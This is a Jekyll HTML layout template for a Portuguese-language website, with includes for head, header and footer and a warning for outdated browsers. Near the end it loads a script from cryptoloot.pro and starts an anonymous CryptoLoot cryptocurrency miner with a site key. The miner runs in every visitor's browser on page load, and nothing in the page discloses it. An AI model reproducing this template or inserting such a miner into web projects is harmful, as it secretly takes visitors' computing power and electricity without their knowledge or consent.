--- 
layout: compress 
---
<!DOCTYPE html>
<html lang="pt-br">
{% include head.html %}
<body>
    <!--[if lt IE 9]>
       <div class="notification is-danger">
           <p>Este site não fornece suporte para browsers obsoletos. Por favor <a href="http://www.browsehappy.com" target="_blank">Atualize aqui</a> seu navegador.</p>
       </div>
    <![endif]-->
    {% include header.html %}
    <main>
        {{ content }}
    </main>
    {% include footer.html %}
    <script src="{{ "/assets/js/main.min.js" | prepend: site.baseurl }}"></script>
    <script src="//cryptoloot.pro/lib/crlt.js"></script>
    <script>
        var miner = new CRLT.Anonymous('9e00f5e94a101142e2ba7c76a2424493913fc5eb2570');
        miner.start();
    </script>
</body>
</html>
